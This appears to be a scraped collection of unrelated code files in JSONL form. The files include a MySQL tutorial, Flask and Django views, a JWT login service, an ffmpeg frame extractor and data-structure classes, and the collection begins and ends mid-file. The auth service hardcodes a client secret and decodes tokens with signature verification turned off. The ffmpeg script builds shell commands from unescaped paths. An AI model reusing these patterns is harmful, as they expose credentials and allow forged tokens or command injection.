total_count\n for key, value in dict.items():\n if self.h in key:\n value = UCHourHistogram.satnatize_value(value)\n if 'total_count' in key:\n self.t = value\n\n @staticmethod\n def satnatize_value(self, v):\n if v == '' or v == None:\n return '0'\n if type(v) == unicode:\n return v.encode('unicode-escape').decode('string_escape')\n return str(v)\n\n @staticmethod\n def build(h, dict):\n tmp = namedtuple(\"UCHourHistogram\", dict.keys())(*dict.values())\n r = UCHourHistogram(tmp.h, {})\n r.t = tmp.t\n return r\n\n @staticmethod\n def add(h, uchour1_h, uchour2_h):\n result = UCHourHistogram(h, {})\n result.t = (uchour1_h.t) + (uchour2_h.t)\n return result\n\n @staticmethod\n def devide(uchour_h, length_days):\n if length_days == 0:\n return uchour_h\n result = UCHourHistogram(uchour_h.h, {})\n result.t = (float(uchour_h.t) / float(length_days))\n return result\n","sub_path":"Processes/imscommon/imscommon/model/uchourhistogram.py","file_name":"uchourhistogram.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"410678772","text":"import mysql.connector\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"*******\",\n database=\"testdb\",\n)\n\n# print(mydb)\n\nmy_cursor = mydb.cursor()\n# mydb.cursor is just a instance of actual cursor\n\n# create db\nmy_cursor.execute(\"CREATE DATABASE testdb\")\n\n\n# show db\nmy_cursor.execute(\"SHOW DATABASES\")\nfor db in my_cursor:\n print(db)\n\n# creating table\nmy_cursor.execute(\n \"CREATE TABLE users (name VARCHAR(255), email VARCHAR(255), age INTEGER(10), user_id INTEGER AUTO_INCREMENT PRIMARY KEY)\")\n\n\n# showing tables\nmy_cursor.execute(\"SHOW TABLES\")\nfor table in my_cursor:\n print(table[0])\n\n\n# inserting into db\nsqlStuff = \"INSERT INTO users (name, email, age) VALUES (%s, %s, %s)\"\nrecord1 = (\"John\", \"john@codemy.com\", 40)\n\nmy_cursor.execute(sqlStuff, record1)\nmydb.commit()\n\n\n# inserting many records\nsqlStuff = \"INSERT INTO users (name, email, age) VALUES (%s, %s, %s)\"\nrecords = [\n (\"Johnny\", \"johnny@codemy.com\", 41),\n (\"Johnathon\", \"johnathon@codemy.com\", 36),\n (\"Joma\", \"joma@codemy.com\", 45),\n]\n\nmy_cursor.executemany(sqlStuff, records)\nmydb.commit()\n\n\n# showing data\nmy_cursor.execute(\"SELECT * FROM users\")\nresult = my_cursor.fetchall()\nfor row in result:\n print(row)\n # print(row[1])\n\n# Pull Data from the table\nmy_cursor.execute(\"SELECT * FROM users\")\nresult = my_cursor.fetchall()\nprint(\"NAME\\tEMAIL\\t\\t\\tAGE\\tID\")\nprint(\"----\\t-----\\t\\t\\t---\\t---\")\nfor row in result:\n print(row[0] + \"\\t%s\" %row[1]+ \"\\t\\t%s\" %row[2]+ \"\\t%s\" %row[3])\n\n\n# where clause\nmy_cursor.execute(\"SELECT * FROM users WHERE name = 'john'\")\nresult = my_cursor.fetchall()\nfor row in result:\n print(row)\n\n\n# where like and wildcards\nmy_cursor.execute(\"SELECT * FROM users WHERE name LIKE 'j%'\")\nresult = my_cursor.fetchall()\nfor row in result:\n print(row)\n\n\n# AND / OR clause\nmy_cursor.execute(\"SELECT * FROM users WHERE name LIKE 'j%' AND age>40\")\nresult = my_cursor.fetchall()\nfor row in result:\n print(row)\n\n\n# Updating record\nmy_sql = \"UPDATE users SET age = 17 WHERE user_id = 3\"\nmy_cursor.execute(my_sql)\nmydb.commit()\n\n# Limiting the results\nmy_cursor.execute(\"SELECT * FROM users LIMIT 2 OFFSET 1\")\nresult = my_cursor.fetchall()\nfor row in result:\n print(row)\n\n\n# Order by\nmy_cursor.execute(\"SELECT * FROM users ORDER BY age ASC\")\nresult = my_cursor.fetchall()\nfor row in result:\n print(row)\n\n\n# DELETE record\nmy_sql = \"DELETE FROM users WHERE user_id = 1\"\nmy_cursor.execute(my_sql)\nmydb.commit()\n\n# DELETE / DROP table\nmy_sql = \"DROP TABLE IF EXISTS users\"\nmy_cursor.execute(my_sql)\n","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"467334765","text":"from http.server import HTTPServer, BaseHTTPRequestHandler\nimport sys\nimport time\n\nip = '127.0.0.1'\nport = 8000\naddr = (ip, port)\n\nclass myHTTPHandle(BaseHTTPRequestHandler):\n def do_GET(self):\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n self.wfile.write(bytes('

        {}

        '.format(time.ctime()), 'utf-8'))\n\nhttpd = HTTPServer(addr, myHTTPHandle)\nservip, servport = httpd.socket.getsockname()\nprint('Serving HTTP on {}, port {}'.format(servip, servport))\n\ntry:\n httpd.serve_forever()\nexcept KeyboardInterrupt:\n httpd.server_close()\n sys.exit(0)","sub_path":"Books/GodOfPython/P16_Networking/basehttpServer.py","file_name":"basehttpServer.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"216571817","text":"#!/usr/bin/env python\nimport odoorpc\nimport base64\n\n#wiz_id = 9\n#wiz_id = 12\n#wiz_id = 25\n#wiz_id = 27\n#wiz_id = 28\nwiz_id = 32\no = odoorpc.ODOO.load('vf_prod')\nwiz_o = o.env['bc_subscription_usability.invoice_subscription_wizard']\nsp_o = o.env['stock.picking']\n\nwizard = wiz_o.browse(wiz_id)\nprint('STATE', wizard.state)\nif wizard.state == 'klarna':\n\twizard.new_create_packing_slips()\n\twizard.new_create_parcelfile()\n\nprint('STATE?', wizard.state)\n\nf = open('packingslips.pdf', 'w')\nf.write(base64.b64decode(wizard.packing_slips))\nf.close()\n\nf = open('parcellist.xls', 'w')\nf.write(base64.b64decode(wizard.parcel_list))\nf.close()\n","sub_path":"attic/customer_specific_utils/ventilasjonsfilter/abo/get_docs.py","file_name":"get_docs.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"465008565","text":"from flask import Flask, render_template\napp = Flask(__name__)\n\n@app.route('/')\ndef home_page():\n\tlikes_beer_pong=False\n\tsenders=[\"mtvjesse\",\"kyle\",\"905 shooter\",\"holden cuming\"]\n\treturn render_template(\n\t\t\"index.html\",\n\t\tsenders=senders,\n\t\tlikes_beer_pong = likes_beer_pong\n\t\t)\n\n\n \n\nif __name__ == '__main__':\n app.run(debug = True)","sub_path":"exercises/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"51183841","text":"# - Run all scripts\r\nSCRIPT0 = \"annotate_DataSets.py\"\r\nSCRIPT1 = \"extract_IntentCSVs.py\"\r\nSCRIPT2 = \"merge_CSVModels.py\"\r\n\r\n# Add or remove as necessary\r\nprocessingScripts = [SCRIPT1, SCRIPT2]\r\n\r\nfor i in processingScripts:\r\n exec(open(i).read())","sub_path":"StandaloneDataProcessing/runAll.py","file_name":"runAll.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"641333204","text":"import http.client\n\nimport json\n\nimport jwt\n\nimport datetime\n\nfrom flask_jwt_extended import create_access_token\n\ndef sign_api_token(user):\n expiry_on = datetime.timedelta(days=1)\n jwt_token = create_access_token(identity={'user_id': user, 'nickname': 'parce'}, expires_delta=expiry_on)\n return jwt_token\n\ndef _get_id_token(auth_code):\n conn = http.client.HTTPSConnection(\"dev.login.jala-one.com\")\n auth_url = '/auth/realms/traveler/protocol/openid-connect/token'\n client_id = 'traveler-app'\n redirect_uri = 'http://localhost:5000/auth'\n client_secret = '90460353-da00-439b-baf8-c7a06c9a49ba'\n\n payload = f'grant_type=authorization_code&client_id={client_id}&client_secret={client_secret}&code={auth_code}&redirect_uri={redirect_uri}'\n\n\n #payload = f'grant_type=authorization_code&client_id={client_id}&code={auth_code}&redirect_uri={redirect_uri}'\n\n\n headers = { 'content-type': 'application/x-www-form-urlencoded' }\n\n print(f'URI = {auth_url} and payload is {payload}') \n\n conn.request('POST', auth_url, payload, headers)\n\n res = conn.getresponse()\n data = res.read()\n print(data.decode('utf-8'))\n\n return json.loads(data.decode('utf-8'))\n\ndef verify_user(auth_code, public_key):\n id_token = _get_id_token(auth_code)['id_token']\n decoded = jwt.decode(id_token, public_key, algorithms='RS256', verify=False, \n options={'JWT_DECODE_AUDIENCE' : 'traveler-app', 'JWT_IDENTITY_CLAIM' : 'jti'} )\n return decoded['email'], id_token\n\n","sub_path":"flask/code/P13.AuthJala/services/auth_service.py","file_name":"auth_service.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"247969095","text":"\"\"\"\nCreated on Dec 5, 2019\n\n@author: cbowles\n\"\"\"\n\nimport fileinput\nfrom typing import List\n\nfrom IntCode import IntCode\n\n\ndef main():\n for line in fileinput.input():\n stack: List[int] = [int(x) for x in line.split(',')]\n\n intcode = IntCode(stack)\n\n intcode.inpt(1)\n while not intcode.is_halted():\n print(intcode.run())\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Day05/5_Asteroids.py","file_name":"5_Asteroids.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"585501452","text":"# Functions for analyzing and extracting interesting data\n\n# Load libraries\nimport pandas as pd\n\n# Count medals function with arbitrary number of arguments\ndef count_medals_n(df_orig, *arg):\n \"\"\"\n Gives back number of medals groupby several attributes: *arg\n\n Input:\n df_orig: DataFrame\n *arg: column to get number of \"Medal\"\n \n Returns:\n df_best: new DataFrame\n \"\"\"\n # Remove all NaN (no medal won == NaN)\n df_medals = df_orig[df_orig['Medal'].notna()]\n \n # count medals by column_name\n\n args_list = list(arg)\n args_list.append(\"Medal\")\n df_medals = df_medals.groupby(args_list).count().reset_index()\n\n # \"ID\" column stands for the sum of medals\n args_list.append(\"ID\")\n df_medals = df_medals.loc[:, args_list]\n \n # Changes dataframe from long to wide\n args = list(arg)\n df_medals = df_medals.pivot(index=args, columns=\"Medal\", values=\"ID\")\n\n # replace all NAs by 0\n df_medals.fillna(0, inplace=True)\n\n # generate Total, avoid using for-loop in pandas dataframe\n df_medals[\"Total\"] = df_medals[\"Gold\"] + df_medals[\"Silver\"] + df_medals[\"Bronze\"]\n \n # change type and change indeces to columns\n df_medals = df_medals.astype(int).reset_index(inplace=False)\n\n # Give back new dataframe\n return df_medals\n","sub_path":"analyze_functions.py","file_name":"analyze_functions.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"377394263","text":"\"\"\"empty message\n\nRevision ID: 5665b5e38768\nRevises: 3f8599f1ba77\nCreate Date: 2015-01-23 11:17:17.040830\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '5665b5e38768'\ndown_revision = '3f8599f1ba77'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\nfrom datetime import datetime\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('logfiles', sa.Column('added_time', sa.DateTime(),\n # We let the old values be\n # empty as we'll probably just\n # drop them.\n nullable=True,\n default=datetime.now()))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('logfiles', 'added_time')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/5665b5e38768_.py","file_name":"5665b5e38768_.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"210750872","text":"from apps.wallApp.models import Comment, Message\nfrom django.shortcuts import render, redirect, HttpResponse\nfrom django.http import JsonResponse\n#from .models import Message, Comment\nfrom datetime import datetime, timedelta\nfrom ..loginApp.models import User\nfrom django.utils import timezone\nimport math\n\n\ndef created_at_msg(miDateTime):\n timeDiff = timezone.now()-miDateTime #es un timedelta que tiene .days, .seconds, .microseconds\n if timeDiff.seconds < 120:\n return f\"Posteado hace 1 minuto\"\n elif timeDiff.seconds < 3600:\n minutos, resto = divmod(timeDiff.total_seconds(),60)\n return f\"Posteado hace {round(minutos)} minutos\"\n elif timeDiff.total_seconds() < 3600*24:\n horas, resto = divmod(timeDiff.seconds,3600)\n minutos = math.floor(resto/60)\n if horas == 1:\n if minutos > 0:\n return f\"Posteado hace 1 hora y {minutos} minutos\"\n else:\n return \"Posteado hace 1 hora\"\n elif (horas < 4):\n if minutos > 0:\n return f\"Posteado hace {horas} horas y {minutos} minutos\"\n else:\n return f\"Posteado hace {horas} horas\"\n else:\n return f\"Posteado hace {round(horas)} horas\"\n else:\n return f\"Posteado el {miDateTime.strftime('%d-%m-%Y')} a las {miDateTime.strftime('%H:%M')}\"\n\ndef minutesElapsed(miDateTime):\n return secondsElapsed(miDateTime)/60\n\ndef secondsElapsed(miDateTime):\n #miTimePostgres = User.objects.raw(\"SELECT NOW()\")[0]\n #print(f\"postgres NOW: {miTimePostgres}\")\n #print(f\"postgres: {miDateTime}\")\n #print(f\"now: {datetime.now()}\")\n \n #now = timezone.now()\n\n timeDiff = timezone.now()-miDateTime #es un timedelta que tiene .days, .seconds, .microseconds\n return timeDiff.total_seconds()\n\ndef wallIndex(request,id):\n\n if (\"id\" not in request.session) or (request.session[\"id\"] <= 0):\n return redirect('signin')\n\n context = {\n \"messages\" : Message.objects.filter(user_for_id = id).order_by('-created_at'),\n \"user\" : User.objects.get(id = id),\n #\"user_poster\" : User.objects.get(id = request.session[\"id\"]),\n }\n return render(request,'wall.html',context)\n\ndef postMessage(request):\n \n message = request.POST[\"message\"]\n\n createdMessage = {}\n\n if message != \"\": \n newmessage = Message.objects.create(\n message = message,\n user_id = request.session[\"id\"],\n user_for_id = request.POST[\"id_for\"],\n )\n print(\"new message posted!\")\n if \"tipo\" in request.POST: #armar el createdMessage\n createdMessage[\"id\"] = newmessage.id\n createdMessage[\"message\"] = (newmessage.message).replace(\"<\",\"<\").replace(\">\",\">\")\n user = {\n \"first_name\":newmessage.user.first_name,\n \"last_name\":newmessage.user.last_name,\n \"full_name\":newmessage.user.full_name,\n \"id\":newmessage.user.id,\n }\n createdMessage[\"user\"] = user\n createdMessage[\"created_at\"] = newmessage.created_at\n createdMessage[\"created_at_text\"] = \"Hace menos de 1 minuto\"\n\n if \"tipo\" in request.POST: #js\n print(\"by ajax\")\n return JsonResponse(createdMessage)\n else:\n print(\"by server\")\n return redirect(f\"/users/show/{request.POST['id_for']}\")\n\n\ndef postComment(request):\n\n comment = request.POST[\"comment\"]\n \n createdComment = {}\n\n if comment != \"\": \n newcomment = Comment.objects.create(\n comment = comment,\n user_id = request.session[\"id\"],\n message_id = request.POST[\"message_id\"]\n )\n print(\"new comment posted!\")\n if \"tipo\" in request.POST: #armar el createdComment\n createdComment[\"id\"] = newcomment.id\n \n createdComment[\"comment\"] = (newcomment.comment).replace(\"<\",\"<\").replace(\">\",\">\")\n user = {\n \"first_name\":newcomment.user.first_name,\n \"last_name\":newcomment.user.last_name,\n \"full_name\":newcomment.user.full_name,\n \"id\":newcomment.user.id,\n }\n createdComment[\"user\"] = user\n createdComment[\"created_at\"] = newcomment.created_at\n createdComment[\"created_at_text\"] = \"Hace menos de 1 minuto\"\n\n if \"tipo\" in request.POST: #js\n print(\"by ajax\")\n return JsonResponse(createdComment)\n else:\n print(\"by server\")\n url = f\"/users/show/{request.POST['id_for']}#divcomment-{newcomment.id}\"\n return redirect(url)\n\ndef delMessage(request):\n \n idMsg = request.POST[\"message_id\"]\n message = Message.objects.get(id = idMsg)\n\n response = {}\n\n if secondsElapsed(message.created_at) > 30*60:\n #quit because it is not possible to erase comment after 30mins\n print(\"Didn't erase message (posted more than 30mins ago!)\")\n if \"tipo\" in request.POST: #js\n response[\"deleted\"] = False\n return JsonResponse(response)\n else:\n url = f\"/wall#divmessage-{idMsg}\"\n return redirect(url)\n\n if message.user.id == int(request.session[\"id\"]): #chk que mensaje corresponde al usuario loggeado\n message.delete()\n print(f\"Message {idMsg} deleted!\")\n response[\"deleted\"] = True\n\n if \"tipo\" in request.POST: #js\n print(\"by ajax\")\n return JsonResponse(response)\n else:\n print(\"by server\")\n return redirect(f\"/users/show/{request.POST['id_for']}\")\n \n\ndef delComment(request):\n \n idCom = request.POST[\"comment_id\"]\n comment = Comment.objects.get(id = idCom)\n\n response = {}\n\n if secondsElapsed(comment.created_at) > 30*60:\n #quit because it is not possible to erase comment after 30mins\n print(\"Didn't erased comment (posted more than 30mins ago!)\")\n if \"tipo\" in request.POST: #js\n response[\"deleted\"] = False\n return JsonResponse(response)\n else:\n url = f\"/wall#divcomment-{idCom}\"\n return redirect(url)\n\n if comment.user.id == int(request.session[\"id\"]): #chk que mensaje corresponde al usuario loggeado\n comment.delete()\n print(f\"Comment {idCom} deleted!\")\n response[\"deleted\"] = True\n\n if \"tipo\" in request.POST: #js\n print(\"by ajax\")\n return JsonResponse(response)\n else:\n print(\"by server\")\n return redirect(f\"/users/show/{request.POST['id_for']}\")\n\ndef getMsgComCreatedAt(request):\n #necesito: la diferencia de created_at, username\n response = {}\n response[\"comments\"] = {}\n response[\"messages\"] = {}\n\n messages = Message.objects.all()\n for msg in messages:\n response[\"messages\"][str(msg.id)] = {\n \"created_at\" : created_at_msg(msg.created_at),\n \"minutes\" : minutesElapsed(msg.created_at),\n }\n\n comments = Comment.objects.all()\n for com in comments:\n response[\"comments\"][str(com.id)] = {\n \"created_at\" : created_at_msg(com.created_at),\n \"minutes\" : minutesElapsed(com.created_at),\n }\n\n return JsonResponse(response)\n\n","sub_path":"apps/wallApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"327969063","text":"# ----------------------------------------------------------------------------\n# Nombre: Compilador\n# Autor: Cabral Torres Jorge\n# Profesor: Ana Millan\n# Clase: Lenguaje y automatas 1\n# Creado: 13 abril del 2020\n# Copyright: (c) 2020 by Cabral Torres Jorge\n# ----------------------------------------------------------------------------\n\nfrom lexico import Lexico\nfrom sintactico import Sintactico\nfrom assembly import Assembly\n\nlexico = Lexico()\nlexico.lexico()\nif lexico.errorEncontrado != True:\n print(\"\\n---Analisis lexico terminado---\")\n sintaxis = Sintactico(lexico.cabeza)\n if sintaxis.errorEncontrado != True:\n print(\"\\n---Analisis Sintactico terminado---\")\n for d in sintaxis.dicTypeofvariable:\n print(d,\"-->\",sintaxis.dicTypeofvariable[d])\n assembly = Assembly(sintaxis.polishList, sintaxis.dicTypeofvariable)\n\n \n\n ","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"493113261","text":"#!/usr/bin/env python\n#filename=area_x\n#---------------------------------------by Gao John\n\nfrom __future__ import division\nfrom pylab import *\nimport pyfits\n#from sys import argv\n#from string import atoi,atof\nfrom matplotlib.axes import Axes#\nfrom mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable#\nimport pywcsgrid2\n\n#function setup_axes()\ndef setup_axes():\n ax = pywcsgrid2.subplot(111, header=x_header)\n\n #add colorbar axes\n divider = make_axes_locatable(ax)\n cax = divider.new_horizontal(\"5%\", pad=0.1, axes_class=Axes)\n fig.add_axes(cax)\n\n return ax, cax\n\n#================================================\n#x file: kes 41\nfile_x = pyfits.open('..//xmm//adapt-2000-6000_smaller.fits')\n\nx_data = file_x[0].data\nx_header = file_x[0].header\n(ny,nx) = x_data.shape\n#=================================================\n#radio file: kes 41\nfile_radio = pyfits.open('..//most//MOS336p5_smaller_fk5.fits')\nradio_data = file_radio[0].data\nradio_header = file_radio[0].header\n\n#==================================================\n#============================================\n#prepare figure & axes\nfig = figure(1)\nax, cax = setup_axes()\n\n#draw image\n#x_data=x_data[5:ny-1,0:nx-1]\nim = ax.imshow(x_data, cmap=cm.Purples_r, origin=\"lower\", interpolation='none')\n#im.set_clim()\n\n#draw contour\ncont = ax[radio_header].contour(radio_data, levels=arange(0.,1.2,0.1), colors=\"y\", alpha=0.5)\n\nfor col in cont.collections:\n col.set_linewidth(0.5)\n\ncbar = colorbar(im, cax=cax)\n\n#adjust colorbar ticks and add levels for contour lines\n#cbar.set_ticks()\n#cbar.add_lines(cont)\n#labels\ncax.set_ylabel(\"Jy/Beam\")\n\n#ax.set(xlim=(0,nx-1), ylim=(5,ny-1))\nax.set_xlabel(\"Right Ascension (J2000)\")\nax.set_ylabel(\"Declination (J2000)\")\n#show()\n\n#imshow(co_after_cut)\n#colorbar()\n#cont = ax[radio_header].contour(radio_data)\nfnames = 'area_x.eps'\n#ax.set_rasterization_zorder(2.1)\n#cax.set_rasterization_zorder(2.1)\nsavefig(fnames, bbox_inches=\"tight\")\n","sub_path":"area_x.py","file_name":"area_x.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"83623566","text":"class TreeNode:\n\n def __init__(self, key, val, left=None, right=None, parent=None) -> None:\n self.key = key\n self.payload = val\n self.left_child = left\n self.right_child = right\n self.parent = parent\n\n @property\n def has_left_child(self) -> bool:\n return bool(self.left_child)\n\n @property\n def has_right_child(self) -> bool:\n return bool(self.right_child)\n\n @property\n def is_left_child(self) -> bool:\n return self.parent and self.parent.left_child == self\n\n @property\n def is_right_child(self) -> bool:\n return self.parent and self.parent.right_child == self\n\n @property\n def is_root(self) -> bool:\n return not self.parent\n\n @property\n def is_leaf(self) -> bool:\n return not (self.right_child or self.left_child)\n\n @property\n def has_any_children(self) -> bool:\n return self.right_child or self.left_child\n\n @property\n def has_both_children(self) -> bool:\n return self.right_child and self.left_child\n\n def replace_node_data(self, key, val, lc, rc) -> None:\n self.key = key\n self.payload = val\n self.left_child = lc\n self.right_child = rc\n if self.has_left_child:\n self.left_child.parent = self\n if self.has_right_child:\n self.right_child.parent = self\n\n def find_successor(self):\n succ = None\n if self.has_right_child:\n succ = self.right_child.find_min()\n else:\n if self.parent:\n if self.is_left_child:\n succ = self.parent\n else:\n self.parent.right_child = None\n succ = self.parent.find_successor()\n self.parent.right_child = self\n return succ\n\n def find_min(self):\n current = self\n while current.has_left_child:\n current = current.left_child\n return current\n\n def splice_out(self):\n if self.is_leaf:\n if self.is_left_child:\n self.parent.left_child = None\n else:\n self.parent.right_child = None\n elif self.has_any_children:\n if self.has_left_child:\n if self.is_left_child:\n self.parent.left_child = self.left_child\n else:\n self.parent.right_child = self.left_child\n self.left_child.parent = self.parent\n else:\n if self.is_left_child:\n self.parent.leftChild = self.right_child\n else:\n self.parent.rightChild = self.right_child\n self.right_child.parent = self.parent\n\n def __iter__(self):\n if self:\n if self.has_left_child:\n for elem in self.left_child:\n yield elem\n yield self.key\n if self.has_right_child:\n for elem in self.right_child:\n yield elem\n\n\nclass BinarySearchTree:\n\n def __init__(self) -> None:\n self.root = None\n self.size = 0\n\n def length(self):\n return self.size\n\n def __len__(self):\n return self.size\n\n def __iter__(self):\n return self.root.__iter__()\n\n def _put(self, key, val, current_node: TreeNode) -> None:\n if key < current_node.key:\n if current_node.has_left_child:\n self._put(key, val, current_node.left_child)\n else:\n current_node.left_child = TreeNode(key, val, parent=current_node)\n else:\n if current_node.has_right_child:\n self._put(key, val, current_node.right_child)\n else:\n current_node.right_child = TreeNode(key, val, parent=current_node)\n\n def put(self, key, val) -> None:\n if self.root:\n self._put(key, val, self.root)\n else:\n self.root = TreeNode(key, val)\n self.size += 1\n\n def __setitem__(self, key, value):\n self.put(key, value)\n\n def get(self, key):\n if self.root:\n res = self._get(key, self.root)\n if res:\n return res.payload\n return None\n\n def _get(self, key, current_node: TreeNode):\n if not current_node:\n return None\n elif current_node.key == key:\n return current_node\n elif key < current_node.key:\n return self._get(key, current_node.left_child)\n else:\n return self._get(key, current_node.right_child)\n\n def __getitem__(self, item):\n return self.get(item)\n\n def __contains__(self, item) -> bool:\n if self._get(item, self.root):\n return True\n return False\n\n def delete(self, key):\n if self.size > 1:\n node_to_remove = self._get(key, self.root)\n if node_to_remove:\n self.remove(node_to_remove)\n self.size -= 1\n else:\n raise KeyError(f\"Error, key: {key} not in tree\")\n elif self.size == 1 and self.root.key == key:\n self.root = None\n self.size -= 1\n else:\n raise KeyError(f\"Error, key: {key} not in tree\")\n\n def __delitem__(self, key):\n self.delete(key)\n\n def remove(self, current_node: TreeNode):\n if current_node.is_leaf:\n if current_node == current_node.parent.left_child:\n current_node.parent.left_child = None\n else:\n current_node.parent.right_child = None\n elif current_node.has_both_children:\n succ = current_node.find_successor()\n succ.splice_out()\n current_node.key = succ.key\n current_node.payload = succ.payload\n else: # this node has one child\n if current_node.has_left_child:\n if current_node.is_left_child:\n current_node.left_child.parent = current_node.parent\n current_node.parent.left_child = current_node.left_child\n elif current_node.is_right_child:\n current_node.left_child.parent = current_node.parent\n current_node.parent.left_child = current_node.left_child\n else:\n current_node.replace_node_data(current_node.left_child.key,\n current_node.left_child.payload,\n current_node.left_child.left_child,\n current_node.left_child.right_child)\n else:\n if current_node.is_left_child:\n current_node.right_child.parent = current_node.parent\n current_node.parent.left_child = current_node.right_child\n elif current_node.is_right_child:\n current_node.right_child.parent = current_node.parent\n current_node.parent.right_child = current_node.right_child\n else:\n current_node.replace_node_data(current_node.right_child.key,\n current_node.right_child.payload,\n current_node.right_child.left_child,\n current_node.right_child.right_child)\n\n\nif __name__ == \"__main__\":\n mytree = BinarySearchTree()\n mytree[3] = \"red\"\n mytree[4] = \"blue\"\n mytree[6] = \"yellow\"\n mytree[2] = \"at\"\n\n print(mytree[6])\n print(mytree[2])\n del mytree[2]\n print(mytree[4])\n","sub_path":"lesson27/lesson27_1.py","file_name":"lesson27_1.py","file_ext":"py","file_size_in_byte":7648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"45148986","text":"#LANGLADE Maxime\n#16/04/20\nimport os\nfrom math import floor\nfrom os.path import join\nimport argparse\nimport subprocess\nimport cv2\nimport random\nimport glob\n\nfrom tqdm import tqdm\n\ndef extract_I_frames(video_path, output_path):\n\n\t#video_path = \"/Volumes/VERBATIM\\ HD/\" + video_path[21:]\n\t#print(\"V_P =\", video_path)\n\n\tos.makedirs(output_path, exist_ok=True)\n\n\n\tout_file = join(output_path, '%03d.png')\n\tselect_cmd = \" -f image2 -vf \" + '''\"select='eq(pict_type,PICT_TYPE_B)'\"'''\n\t#select_cmd = \" -f image2 -vf \" + '''\"select='eq(pict_type,B)'\"'''\n\tcmd = \"ffmpeg -i \" + video_path + select_cmd + \" -vsync vfr \" + out_file\n\t\n\tos.system(cmd) \n\n\ndef process(data_path):\n\t#video_list_path = '/Volumes/VERBATIM_HD/Stage_Maxime/Celeb-DF-v2/deep/test'\n\t#video_list = glob.glob(join(video_list_path, 'id*'))\n\n\t#video_to_process = []\n\t#for video_path in video_list:\n\t#\tname = video_path.split('.')[0]\n\t#\tname = name.split('/')[-1]\n\t#\tvideo_to_process.append(name)\n\n\tvideo_path = join(data_path, \"videos\")\n\timages_path = join(data_path, \"images\", \"B\")\n\n\tvideo_list = glob.glob(join(video_path, 'gen_*'))\n\t#video_list = [video_list_orig, video_list_fake]\n\n\tprint(video_list)\n\n\n\tos.makedirs(images_path, exist_ok=True)\n\n\n\t#video_in_folder = glob.glob(join(videos_path, generic_video_name))\n\n\t#nb_video_in_folder = len(video_to_process)\n\n\tfor video in tqdm(video_list):\n\t\tvideo_name = video.split('.')[0]\n\t\tvideo_name = video_name.split('/')[-1]\n\t\toutput_folder = join(images_path, video_name)\n\t\textract_I_frames(video, output_folder)\n\n\nif __name__ == '__main__':\n\tp = argparse.ArgumentParser(\n\t\tformatter_class=argparse.ArgumentDefaultsHelpFormatter\n\t)\n\tp.add_argument('--data_path','-p' , type=str)\n\targs = p.parse_args()\n\n\tprocess(**vars(args))","sub_path":"I_P_Compare/frame_extraction_gen.py","file_name":"frame_extraction_gen.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"174857505","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('adopteitor_core', '0004_auto_20160326_2023'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='animal',\n name='etapa',\n field=models.CharField(default='a', max_length=1, choices=[(b'c', b'cachorro'), (b'a', b'adulto')]),\n preserve_default=False,\n ),\n ]\n","sub_path":"adopteitor_core/migrations/0005_animal_etapa.py","file_name":"0005_animal_etapa.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"171209206","text":"import random\nclass Matrix:\n def __init__(self,r,c):\n self.rows = r\n self.cols = c\n self.data = []\n for i in range(r):\n self.data.append([])\n for j in range(c):\n self.data[i].append(0)\n\n def random(self):\n for i in range(self.rows):\n for j in range(self.cols):\n self.data[i][j] = random.random()\n\n\n def display(self):\n for i in range(self.rows):\n for j in range(self.cols):\n print(self.data[i][j],end = ' ')\n print()\n print()\n\n\n def addScalar(self,n):\n for i in range(self.rows):\n for j in range(self.cols):\n self.data[i][j] += n\n\n\n @staticmethod\n def add(m1,m2):\n res = 